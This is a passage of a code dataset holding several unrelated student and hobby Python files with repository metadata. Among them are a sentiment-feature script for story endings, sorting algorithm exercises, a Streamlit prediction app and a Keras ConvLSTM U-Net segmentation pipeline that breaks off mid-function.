story_struct[proba['posterior']],\n [story_struct[prior] for prior in proba['prior']])\n elif proba['prior'] == 'context':\n context_sent = np.sign(np.sum(masked_sent_story[0:story_struct['ending']]))\n condensed_sent = np.array([context_sent,\n np.sign(masked_sent_story[story_struct['ending']])])\n # 0 because since size of array changed,\n # just let know that should take ending as posterior last element (= ending)\n proba_val = self.calc_proba_prior(condensed_sent, 1, 0,\n self.sent_condensed_traj_counts_array)\n else:\n proba_val = self.calc_proba_prior(np.sign(masked_sent_story),\n story_struct[proba['posterior']],\n story_struct[proba['prior']])\n\n else:\n proba_val = self.calc_proba_no_prior(np.sign(masked_sent_story),\n story_struct[proba['posterior']])\n# print(\"Proba {}: {}\" .format(proba, proba_val))\n story_proba_features.append(proba_val)\n proba_features.append(story_proba_features)\n\n proba_features = np.asarray(proba_features).reshape(((-1,\n 2 * (self.sent_traj_counts_array.shape[1]-1))))\n return proba_features[:, :self.sent_traj_counts_array.shape[1]-1], \\\n proba_features[:, self.sent_traj_counts_array.shape[1]-1:]\n\n\n def calc_proba_no_prior(self, sent_story, idx, array=None):\n if array is None:\n array = self.sent_traj_counts_array\n\n masked_sent_array = self.mask_sent_array(array, sent_story[idx], idx)\n if masked_sent_array.size == 0:\n #print('WARNING: could not find the probability. 
Will return 0')\n return 0\n else:\n return np.sum(masked_sent_array[:,-1]) / np.sum(array[:, -1])\n\n\n def calc_proba_prior(self, sent_story, sent_idx, prior_idx, array=None):\n if array is None:\n array = self.sent_traj_counts_array\n masked_sent_array = self.mask_sent_array(array,\n sent_story[prior_idx],\n prior_idx)\n return self.calc_proba_no_prior(sent_story,\n sent_idx,\n masked_sent_array)\n\n\n def mask_sent_array(self, array, value, idx):\n if isinstance(idx, int):\n mask = array[:, idx] \\\n == np.multiply(np.ones(array.shape[0],\n dtype=np.int), value)\n else:\n mask = np.all(array[:, idx] == np.multiply(np.ones((array.shape[0], len(idx)),\n dtype=np.int), value), axis=1)\n return array[mask]\n\n\n def get_sent_endings(self, stories_list):\n sent_endings = []\n for story in stories_list:\n sent_endings.append(self.story2sent(story,\n return_normalized=False)[-2:])\n return np.asarray(sent_endings)\n\n\n def generate_bin_features(self, probas_ending1, probas_ending2):\n comparison = np.ones(probas_ending1.shape)\n comparison[probas_ending1 < probas_ending2] = -1\n return comparison\n\n\n def generate_neutral_features(self, probas_ending1, probas_ending2):\n n1 = np.all(probas_ending1[..., :] == 0, axis=1).astype(np.int)\n n2 = np.all(probas_ending2[..., :] == 0, axis=1).astype(np.int)\n return np.expand_dims(n1, 1), np.expand_dims(n2,1)\n\n\n def generate_diff_sent_features(self, probas_ending1, probas_ending2,\n exclude_neutral=False):\n diff = np.expand_dims(np.any(probas_ending1[:, ...] != probas_ending2[:, ...], axis=1), 1)\n\n if not exclude_neutral:\n return diff.astype(np.int)\n else:\n n1, n2 = self.generate_neutral_features(probas_ending1,\n probas_ending2)\n if not np.any(n1) or not np.any(n2):\n print(\"WARNING: you requested to exclude neutral in diff_sent extra \"\n \"features, but there are no neutral endings. The result will be \"\n \"the same as if you didn't ask to exclude neutrals.\")\n #remove \"true values\" of diff array if ending1 or 2 is neutral\n temp = np.logical_and(np.logical_not(n1.astype(np.bool)), diff)\n diff_excl_neutr = np.logical_and(np.logical_not(n2.astype(np.bool)),\n temp)\n return diff_excl_neutr.astype(np.int)\n\n\n def generate_extra_features(self, probas_ending1, probas_ending2,\n features, stories_list=None, indices=[0, 4]):\n extra = []\n print(\"Adding requested extra features: {}\" .format(features))\n if 'bin' in features:\n b = self.generate_bin_features(probas_ending1,\n probas_ending2)\n extra.append(b)\n\n if 'neutral' in features:\n # Note: if predict_neutral was activated during predict_proba,\n # this feature will be useless\n n1, n2 = self.generate_neutral_features(probas_ending1,\n probas_ending2)\n if not np.any(n1) or not np.any(n2):\n print(\"WARNING: did not find any neutral ending. \"\n \"You asked for adding neutral_features while probably keeping\"\n \" predict_neutral as True. 
I will not add any neutral feature\"\n \" as it would be useless.\")\n else:\n extra.append(n1)\n extra.append(n2)\n\n if 'diff_sent_endings' in features:\n d = self.generate_diff_sent_features(probas_ending1,\n probas_ending2)\n extra.append(d)\n if 'diff_sent_endings_exclude_neutral' in features:\n dnn = self.generate_diff_sent_features(probas_ending1,\n probas_ending2,\n exclude_neutral=True)\n extra.append(dnn)\n if 'sent_endings' in features:\n extra.append(self.get_sent_endings(stories_list))\n\n return np.hstack(extra)\n\n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('data_path', type=str,\n help=\"path to the stories\")\n parser.add_argument('output_path', type=str, help=\"path to the output file\")\n parser.add_argument('config', type=str, help='path to config file')\n parser.add_argument('test_file_name', type=str, help='choose between val_stories.csv, ' \n 'test_stories.csv, or test_nlu18.csv')\n# parser.add_argument('--pretrained_traj_path', type=str, help='Path to file containing array' \\\n# 'of \"counts\" of sentiment trajectories')\n# parser.add_argument('--save_traj_path', type=str, help=\"path to store sentiment_trajectories of model.\" \\\n# \" By default is the same as pretrained_traj_path\")\n# parser.add_argument('--force_retrain', type=bool)\n args = parser.parse_args()\n\n # Load the stories, process them and compute their word embedding\n print('Loading stories according to parsing instructions: {}'.format(train_parsing_instructions))\n train_stories = load_stories(args.data_path + '/train_stories.csv',\n train_parsing_instructions)\n print(\"Train Stories loaded.\")\n if args.test_file_name == 'val_stories.csv':\n print('Loading stories according to parsing instructions: {}'.format(eval_parsing_instructions))\n test_stories = load_stories(args.data_path + '/val_stories.csv',\n eval_parsing_instructions)\n print(\"Eval Stories loaded.\")\n elif args.test_file_name == 'test_nlu18.csv':\n print('Loading stories according to parsing instructions: {}'.format(test_parsing_instructions))\n test_stories = load_stories(args.data_path + '/test_nlu18.csv',\n test_parsing_instructions, header=False)\n print(\"Test NLU 18 Stories loaded.\")\n elif args.test_file_name == 'test_stories.csv':\n print('Loading stories according to parsing instructions: {}'.format(eval_parsing_instructions))\n test_stories = load_stories(args.data_path + '/test_stories.csv',\n eval_parsing_instructions)\n print(\"STC Test Stories loaded.\")\n\n with open(args.config, 'r') as f:\n config = yaml.load(f)\n print(\"Config: {}\".format(config))\n sentiment_analyzer = SentimentAnalyzer(**config)\n start = tm.datetime.now()\n sentiment_analyzer.train(train_stories[0:config.get('n_train_max', None)], **config)\n print('Training time: \\n{}' .format(tm.datetime.now() - start))\n print('Traj counts: {} \\n Traj condensed counts: \\n{}'\\\n .format(sentiment_analyzer.sent_traj_counts_array,\n sentiment_analyzer.sent_condensed_traj_counts_array))\n\n start = tm.datetime.now()\n print('Computing probabilities ...')\n proba_ending1, \\\n proba_ending2 = sentiment_analyzer.predict_proba(test_stories[0:config.get('n_test_max',\n None)], **config)\n extra_features = sentiment_analyzer.generate_extra_features(proba_ending1,\n proba_ending2,\n config.get('extra_features',\n ['bin']))\n print(extra_features)\n # Compute the topic similarity between the endings and the context\n print(proba_ending1, proba_ending2)\n print(\"Done. 
Time for prediction: {}\" .format(tm.datetime.now() - start))\n\n # Write the features to a .npz file\n np.savez_compressed(args.output_path,\n sentiment_ending1=proba_ending1,\n sentiment_ending2=proba_ending2,\n extra_features=extra_features)\n\n\n print(\"Sentiment features stored in \" + args.output_path)\n","repo_name":"nathlacroix/NLP-Adventures","sub_path":"task2/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":29394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1800505044","text":"\"\"\"\n@author: Ollie\n\"\"\"\n\nfrom SudokuGUI import *\n\n\ndef main():\n \"\"\"\n Main function to run through program \n \"\"\"\n game = gui()\n pygame.init()\n game.setup() \n while True: \n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n pygame.display.update()\n game.button_click() \nmain()\n","repo_name":"ojsellers/sudoku","sub_path":"SudokuOperator.py","file_name":"SudokuOperator.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4062230146","text":"import csv\n\nfilename = \"my_table.csv\"\ncolumn_name = \"Price\"\n\n# Open the CSV file for reading\nwith open(filename, \"r\") as file:\n reader = csv.DictReader(file)\n\n # Loop over each row in the CSV file\n for row in reader:\n # Extract the value in the specified column\n value = row[column_name]\n\n # Do something with the value, e.g. print it\n print(value)","repo_name":"Mayankkhannaaa/data-collection-scraping-and-preProcessing","sub_path":"arrayCreation.py","file_name":"arrayCreation.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28493996435","text":"altura = float(input(\"digite sua altura: \"))\npeso = float(input(\"digite seu peso: \"))\n\nimc = peso / (altura*altura)\n\nif (imc < 18.6):\n print(\"Você está abaixo do peso ideal.\")\nelif (18.6 <= imc <= 24.9):\n print(\"Você está no seu peso ideal\")\nelif(25 <= imc <= 29.9):\n print(\"Você esta acima do seu peso ideal.\")\nelse:\n print(\"Você está obeso.\")","repo_name":"MatheusMMarques/Condicionais-e-Arrays---Python","sub_path":"Condicionais.py","file_name":"Condicionais.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39960987538","text":"import random\n\ndef quick_sort(items):\n if len(items) <= 1:\n return items\n\n pivot = items[0]\n lt = quick_sort([item for item in items[1:] if item < pivot])\n gte = quick_sort([item for item in items[1:] if item >= pivot])\n return lt + [pivot] + gte\n \n\ndef test_quick_sort():\n my_list = random.sample(range(-100, 100), 10)\n assert quick_sort(my_list) == sorted(my_list)\n print('sorting: {}'.format(my_list))\n print('sorted :{}'.format(quick_sort(my_list)))\n\nif __name__ == \"__main__\":\n test_quick_sort()","repo_name":"rastgeleo/python_algorithms","sub_path":"sorting/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8088366524","text":"# sorting algorithm\n\n# binary search\n# - 오름차순으로 정렬된 리스트를 반씩 줄여가면서 서치하는 것\n\n# 1. 
selection algorithm O(N**2)\n# 정렬되지 않은 원소 중에서 매번 가장 작은 값을 선택해서 swap\n# 0번째 원소를 가장 작은 수로 세팅해놓고 전체 배열을 순회하면서 가장 작은 수를 찾아서 swap 을 해준다.\narray = [1, 5, 3, 6, 8, 4, 7, 9, 0, 2]\ndef selection(arr):\n for i in range(len(arr)):\n min_idx = i\n for j in range(i + 1, len(arr)):\n if arr[min_idx] > arr[j]:\n min_idx = j\n # 아래와 같은 코드를 작성하면 두 원소의 위치가 swap 됨\n arr[i], arr[min_idx] = arr[min_idx], arr[i]\n print(arr)\n\n# 2. insertion sort O(N*2)\n# 0번째는 가장 작다는 전제 안에서 1번째부터 시작해서 왼쪽에 있는 값을 확인 하고 1번째 보다 작으면 swap\ndef insertion(arr):\n for i in range(1, len(arr)):\n for j in range(i, 0, -1):\n if arr[j] < arr[j-1]: # 한 칸 왼쪽으로 이동\n arr[j], arr[j-1] = arr[j-1], arr[j]\n else: # 자기보다 작은 데이터를 만나면 그 위치에서 멈춤\n break\n print(arr)\n\n# 3. Quick sort O(n log n) || pivot 설정 실패에 따른 worst cast: O(N**2)\n# arr, start = 0, end = len(array)-1\n# 배열의 0번째 원소를 pivot 으로 지정 -> pivot의 바로 다음 원소를 left, 맨 마지막 원소(배열의 끝)를 right로 지정해서 left엔 pivot 보다 작은, right엔 큰 애들로 분리한다.\n# 만약 각 방향에서 이 규칙을 따르지 않는 원소를 찾게 되면 두 원소를 swap 시켜준다.\n# pivot 보다 작은 원소 큰 원소로 그룹이 나뉘였으면 pivot과 left 그룹의 가장 마지막 원소와 swap 한다.\n# 각 그룹에서 또 다시 가장 첫번째 원소를 pivot으로 지정하고 그룹마다 quick sort를 실행 시켜준다. 🔁\narray = [26, 25, 24, 9, 16, 37, 34, 59, 68]\n\ndef quick(arr, start, end):\n if start >= end:\n return\n pivot = start\n left = start + 1\n right = end\n while left <= right:\n # 피벗보다 큰 데이터를 찾을 때 까지 반복\n while left <= end and arr[left] <= arr[pivot]:\n left += 1\n # 피벗보다 작은 데이터를 찾을 때 까지 반복\n while right > start and arr[right] >= arr[pivot]:\n right -= 1\n # 서로 엇갈렸다면\n if left > right:\n print(left, right)\n arr[right], arr[pivot] = arr[pivot], arr[right]\n # 엇갈리지 않았다면 작은 데이터와 큰 데이터를 교체\n else:\n arr[left], arr[right] = arr[right], arr[left]\n # 분할 이후 왼쪽 부분과 오른쪽 부분 각각에 대해 퀵 정렬 수행\n print(arr)\n quick(arr, start, right - 1)\n quick(arr, right + 1, end)\n\nquick(array, 0, len(array) - 1)\n","repo_name":"shinyuna/algorithm_study","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"37754092851","text":"# Write a program to perform following dictionary operations given below:\r\n# 1. Access Item\r\n# 2. Change Item\r\n# 3. Add Item\r\n# 4. Remove Item\r\n\r\n\r\n\r\ndef access(v_dict):\r\n for key,item in v_dict.items():\r\n print(item)\r\n\r\ndef change(v_dict):\r\n item = int(input(\"Enter the item key whose value to be changed: \"))\r\n value = input(\"Enter the value to be replaced : \")\r\n \r\n for index in v_dict:\r\n if index == item:\r\n v_dict[item] = value\r\n \r\n print(v_dict)\r\n \r\ndef add(v_dict):\r\n key = int(input(\"Enter the key to be added: \"))\r\n value = input(\"Enter the associated value for the key : \")\r\n v_dict[key]=value\r\n print(v_dict)\r\n \r\n\r\ndef remove(v_dict):\r\n key = int(input(\"Enter the key for the item pair to be removed: \"))\r\n del v_dict[key]\r\n print(v_dict)\r\n \r\n\r\n\r\ndict1 = {1:\"one\",2:\"two\",3:\"three\",4:\"four\",5:\"five\"}\r\n\r\nch = int(input(\"Choose operation:\\n1. Access Item \\n2. Change Item\\n3. Add Item\\n4. Remove Item\\n\"))\r\n\r\nif ch==1:\r\n access(dict1)\r\nelif ch==2:\r\n change(dict1)\r\nelif ch==3:\r\n add(dict1)\r\nelse:\r\n remove(dict1)","repo_name":"tejasgolhar2/python-basic-to-advanced","sub_path":"Advanced Programming - 7th Sem/3. 
Question Bank Problems/Unit 2/07_dictionary_operations.py","file_name":"07_dictionary_operations.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35454427987","text":"import streamlit as st \r\nimport joblib \r\nfrom streamlit_option_menu import option_menu\r\nfrom streamlit_lottie import st_lottie\r\nimport pandas as pd\r\nimport json\r\nimport sklearn\r\n\r\nhouse_price = joblib.load(r\"C:\\Users\\Anmino\\Desktop\\Machine-Learning_2\\Linear_Regression\\usa_house_pricing.pkl\")\r\nheart_fail_model = joblib.load(r\"C:\\Users\\Anmino\\Desktop\\Machine-Learning_2\\Logistic_Regression\\heart_failure_clinical_records_datase.pkl\")\r\n\r\ndef load_lottyfile(filepath:str):\r\n with open(filepath,'r') as f:\r\n return json.load(f)\r\n\r\nhouse_price_pred_img = load_lottyfile('house.json')\r\n\r\n\r\ndef main():\r\n select = option_menu(menu_title=None,\r\n options=['Home','Project','About'],\r\n icons=['house','laptop','book'],\r\n orientation='horizontal')\r\n \r\n if select=='Project':\r\n model_type1 = ['House Price','Heart Failure']\r\n model_type = st.sidebar.selectbox(\"📚Project's\",model_type1)\r\n \r\n try:\r\n if model_type=='House Price':\r\n col1,col2,col3 = st.columns([1,2,1])\r\n #with col2:\r\n #st_lottie(house_price_pred_img,width=300,height=200,quality='high')\r\n col1,col2 = st.columns([1,1])\r\n \r\n with col1:\r\n avg_area_income = st.text_input('Area Income')\r\n with col2:\r\n avg_area_house_age = st.text_input('House Age')\r\n with col1:\r\n area_number_of_rooms = st.text_input('Number of Rooms')\r\n with col2:\r\n number_of_bedrooms = st.text_input('Number of Bedrooms')\r\n with col1:\r\n area_population = st.text_input('Area Population')\r\n \r\n with col1:\r\n submit_button = st.button('Predict')\r\n if submit_button:\r\n pred = house_price.predict([[avg_area_income,\r\n avg_area_house_age,\r\n area_number_of_rooms,\r\n number_of_bedrooms,\r\n area_population]])\r\n st.success(f\"🤖Prediction: {pred[0]}\")\r\n #2nd project \r\n elif model_type==\"Heart Failure\":\r\n with st.form('form1',clear_on_submit=True):\r\n col1,col2,col3 = st.columns([1,1,1])\r\n with col1:\r\n age = st.text_input('Age')\r\n \r\n with col2:\r\n an = ['Select',1,0]\r\n anaemia = st.selectbox('Anaemia',an)\r\n with col3:\r\n creatinine_phosphokinase = st.text_input('Creatinine Phosphokinase')\r\n with col1:\r\n diabetes_box = ['Select',0,1]\r\n diabetes = st.selectbox('Diabetes',diabetes_box)\r\n with col2:\r\n ejection_fraction = st.text_input(\"Ejection Fraction\")\r\n with col3:\r\n high_blood_pressure_box = [\"Select\",0,1]\r\n high_blood_pressure = st.selectbox('High Blood Pressure',high_blood_pressure_box)\r\n with col1:\r\n platelets = st.text_input(\"Platelets\")\r\n with col2:\r\n serum_creatinine = st.text_input(\"Serum Creatinine\")\r\n with col3:\r\n serum_sodium = st.text_input(\"Serum Sodium\")\r\n with col1:\r\n gender = [\"Select\",'1',\"0\"]\r\n sex = st.selectbox(\"Gender\",gender)\r\n with col2:\r\n smoking_box = [\"Select\",1,0]\r\n smoking = st.selectbox(\"Smoking\",smoking_box) \r\n with col3:\r\n time = st.slider(\"Smoking Per/Day\",1,300) \r\n with col1:\r\n button = st.form_submit_button(\"Predict\")\r\n if button:\r\n model_pred = heart_fail_model.predict([[age,\r\n anaemia,\r\n creatinine_phosphokinase,\r\n diabetes,\r\n ejection_fraction,\r\n high_blood_pressure,\r\n platelets,\r\n serum_creatinine,\r\n serum_sodium,\r\n sex,\r\n smoking,\r\n time]])\r\n 
st.success(f\"🤖Prediction: {model_pred[0]}\") \r\n \r\n except:\r\n st.warning('❗Please enter the correct value for prediction...')\r\n \r\n \r\n \r\n\r\nif __name__=='__main__':\r\n main()\r\n\r\n","repo_name":"Anmol2121/Streamlit_Heart_Fail_project","sub_path":"heart_fail_predict.py","file_name":"heart_fail_predict.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30702766119","text":"\"\"\"\r\nCreated on Sat Mar 3 18:38:30 2019\r\n\r\nData processing for robotic Multiple image segmentation with ConvLSTM Unet model\r\n\r\n@author: YONG Huawei\r\n\"\"\"\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.optimizers import *\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras.layers.convolutional_recurrent import ConvLSTM2D\r\nfrom keras import backend as K\r\nfrom PIL import Image\r\nfrom imgaug import augmenters as iaa\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport os\r\nimport cv2\r\n\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\r\n\r\noriginal_height, original_width = 1080, 1920\r\nheight, width = 1024, 1280\r\nh_start, w_start = 28, 320\r\n\r\n\r\ndef read_img(path, target_size, color_mode, multi_mask=False, num_class=1):\r\n try:\r\n img = Image.open(path).convert(color_mode)\r\n except Exception as e:\r\n print(e)\r\n else: # this part can function only if the try is processing successfully\r\n img_arry = np.array(img)\r\n img_new = img_arry[h_start:h_start + height, w_start:w_start + width]\r\n img_arry = cv2.resize(img_new, target_size, interpolation=cv2.INTER_CUBIC)\r\n\r\n if multi_mask is True:\r\n # print(img_arry.shape)\r\n mask = np.zeros(shape=img_arry.shape + (num_class,))\r\n color_dict = [0, 50, 100, 150, 200]\r\n # defining the grey scale pixels for\r\n # Left_labels, Maryland_labels, Ot_labels, Right_labels seperatelly\r\n for i in range(num_class):\r\n mask[img_arry == color_dict[i], i] = 1 # background is one of the Five classes\r\n img_arry = mask\r\n\r\n else:\r\n img_arry = img_arry - np.mean(img_arry).astype('uint8')\r\n img_arry = np.reshape(img_arry, (img_arry.shape[0], img_arry.shape[1], 1))\r\n\r\n x = np.expand_dims(img_arry, axis=0)\r\n return x\r\n\r\n\r\ndef my_gen(time_seq, path, image_folder, mask_folder,\r\n batch_size, target_size=(256, 256)):\r\n # img_list = glob.glob(path + '*.png') # 获取path里面所有图片的路径\r\n image_path = path + '/' + image_folder\r\n mask_path = path + '/' + mask_folder\r\n img_list = os.listdir(image_path)\r\n msk_list = os.listdir(mask_path)\r\n steps = len(img_list) // time_seq # get the integer to the floor\r\n # print(steps)\r\n print(\"Found %s images.\" % len(img_list))\r\n print(\"Found %s masks.\" % len(msk_list))\r\n\r\n while True:\r\n time_array = []\r\n mask_array = []\r\n counter = 0\r\n for i in range(steps):\r\n counter += 1\r\n batch_list = img_list[i * time_seq: i * time_seq + time_seq]\r\n mask_list = msk_list[i * time_seq: i * time_seq + time_seq]\r\n x = [read_img(str(image_path + '/' + file), target_size, color_mode=\"L\") for file in batch_list]\r\n y = [read_img(str(mask_path + '/' + file), target_size, color_mode=\"L\", multi_mask=True, num_class=5) for file in\r\n mask_list]\r\n # print(x[0][0].shape)\r\n # t = Image.fromarray(x[0][0])\r\n # t.show()\r\n batch_x = np.concatenate([array for array in x])\r\n batch_y = np.concatenate([arr for arr in y])\r\n # print(\"batch_x = %s\" %(batch_x.shape)) (3, 256, 256, 1)\r\n # print(\"batch_y = %s\" %(batch_y.shape)) # (3, 
256, 256, 5)\r\n\r\n time_array.append(batch_x)\r\n mask_array.append(batch_y)\r\n\r\n augmenters_imgs = [iaa.Affine(rotate=(-10, 10)),\r\n iaa.ElasticTransformation(sigma=0.2)]\r\n\r\n seq_imgs = iaa.Sequential(augmenters_imgs, random_order=False)\r\n\r\n if counter % batch_size == 0:\r\n seq_imgs_deterministic = seq_imgs.to_deterministic() # call this everytime reset the seed\r\n for i in range(batch_size):\r\n time_array[i] = np.expand_dims(np.array(seq_imgs_deterministic.augment_images(time_array[i])),\r\n axis=0)\r\n mask_array[i] = np.expand_dims(np.array(seq_imgs_deterministic.augment_images(mask_array[i])),\r\n axis=0)\r\n # print(\"batch_x = %s\" %(batch_x.shape)) # (1, 3, 256, 256, 1)\r\n # print(\"batch_y = %s\" %(batch_y.shape)) # (1, 3, 256, 256, 5)\r\n train_x = np.concatenate([array for array in time_array])\r\n mask_y = np.concatenate([arr for arr in mask_array])\r\n\r\n time_array = [] # every batch_size cube then reset the list to zero\r\n mask_array = []\r\n\r\n # the mask shape (batch_size, sequence, 256, 256, 5)\r\n # the image shape (batch_size, seq, 256, 256, Channel)\r\n\r\n yield train_x, mask_y\r\n\r\n\r\ndef validation_generator(time_seq, path, image_folder, mask_folder,\r\n batch_size, target_size=(256,256)):\r\n image_path = path + '/' + image_folder\r\n mask_path = path + '/' + mask_folder\r\n img_list = os.listdir(image_path)\r\n msk_list = os.listdir(mask_path)\r\n steps = len(img_list) // time_seq # get the integer to the floor\r\n # print(steps)\r\n print(\"Found %s validation_images.\" % len(img_list))\r\n print(\"Found %s validation_masks.\" % len(msk_list))\r\n\r\n while True:\r\n time_array = []\r\n mask_array = []\r\n counter = 0\r\n for i in range(steps):\r\n counter += 1\r\n batch_list = img_list[i * time_seq: i * time_seq + time_seq]\r\n mask_list = msk_list[i * time_seq: i * time_seq + time_seq]\r\n x = [read_img(str(image_path + '/' + file), target_size, color_mode=\"L\") for file in batch_list]\r\n y = [read_img(str(mask_path + '/' + file), target_size, color_mode=\"L\", multi_mask=True, num_class=5) for file in\r\n mask_list]\r\n\r\n batch_x = np.concatenate([array for array in x])\r\n batch_y = np.concatenate([arr for arr in y])\r\n # print(batch_x.shape)\r\n batch_x = np.expand_dims(batch_x, axis=0) # expand the batch axis\r\n batch_y = np.expand_dims(batch_y, axis=0)\r\n # print(batch_x.shape) # (1, 3, 256, 256,1)\r\n time_array.append(batch_x)\r\n mask_array.append(batch_y)\r\n if counter % batch_size == 0:\r\n train_x = np.concatenate([array for array in time_array])\r\n mask_y = np.concatenate([arr for arr in mask_array])\r\n print(len(mask_y))\r\n\r\n time_array = [] # per batch_size cube then reset the list to zero\r\n mask_array = []\r\n\r\n yield train_x, mask_y\r\n\r\n\r\ndef convLSTM_unet(pretrained_weights=None, input_size=(None, 256, 256, 1)):\r\n \r\n inputs = Input(input_size)\r\n conv1 = TimeDistributed(Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(inputs)\r\n conv1 = TimeDistributed(Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv1)\r\n pool1 = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(conv1)\r\n\r\n conv2 = TimeDistributed(Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(pool1)\r\n conv2 = TimeDistributed(Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv2)\r\n pool2 = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(conv2)\r\n\r\n conv3 = 
TimeDistributed(Conv2D(256, 3, activation='relu', padding = 'same', kernel_initializer = 'he_normal'))(pool2)\r\n conv3 = TimeDistributed(Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv3)\r\n pool3 = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(conv3)\r\n\r\n conv4 = TimeDistributed(Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(pool3)\r\n conv4 = TimeDistributed(Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv4)\r\n drop4 = TimeDistributed(Dropout(0.5))(conv4)\r\n pool4 = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(drop4)\r\n\r\n conv5 = TimeDistributed(Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(pool4)\r\n conv5 = TimeDistributed(Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv5)\r\n drop5 = TimeDistributed(Dropout(0.5))(conv5)\r\n\r\n up6 = ConvLSTM2D(512, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)(TimeDistributed(UpSampling2D(size=(2,2)))(drop5))\r\n\r\n merge6 = concatenate([drop4, up6], axis = 4)\r\n conv6 = ConvLSTM2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)(merge6)\r\n conv6 = ConvLSTM2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)(conv6)\r\n\r\n up7 = ConvLSTM2D(256, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)\\\r\n (TimeDistributed(UpSampling2D(size = (2,2)))(conv6))\r\n merge7 = concatenate([conv3,up7], axis = 4)\r\n conv7 = ConvLSTM2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)(merge7)\r\n conv7 = ConvLSTM2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)(conv7)\r\n\r\n up8 = ConvLSTM2D(128, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)\\\r\n (TimeDistributed(UpSampling2D(size = (2,2)))(conv7))\r\n merge8 = concatenate([conv2,up8], axis = 4)\r\n conv8 = ConvLSTM2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal', return_sequences=True)(merge8)\r\n conv8 = ConvLSTM2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal', return_sequences=True)(conv8)\r\n\r\n up9 = ConvLSTM2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)\\\r\n (TimeDistributed(UpSampling2D(size = (2,2)))(conv8))\r\n merge9 = concatenate([conv1,up9], axis = 4)\r\n conv9 = ConvLSTM2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal', return_sequences=True)(merge9)\r\n conv9 = ConvLSTM2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal', return_sequences=True)(conv9)\r\n conv9 = TimeDistributed(Conv2D(5, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv9)\r\n conv10 = TimeDistributed(Conv2D(5, 1, activation = 'softmax'))(conv9)\r\n\r\n model = Model(input=inputs, output=conv10)\r\n\r\n # plot_model(model, to_file='seg_UNet3D.png', show_shapes=True)\r\n # model.summary()\r\n\r\n if(pretrained_weights):\r\n model.load_weights(pretrained_weights)\r\n\r\n return model\r\n\r\n\r\ndef mean_iou(y_true, y_pred):\r\n prec = []\r\n for t in np.arange(0.5, 1.0, 0.05):\r\n y_pred_ = tf.to_int32(y_pred > t)\r\n 
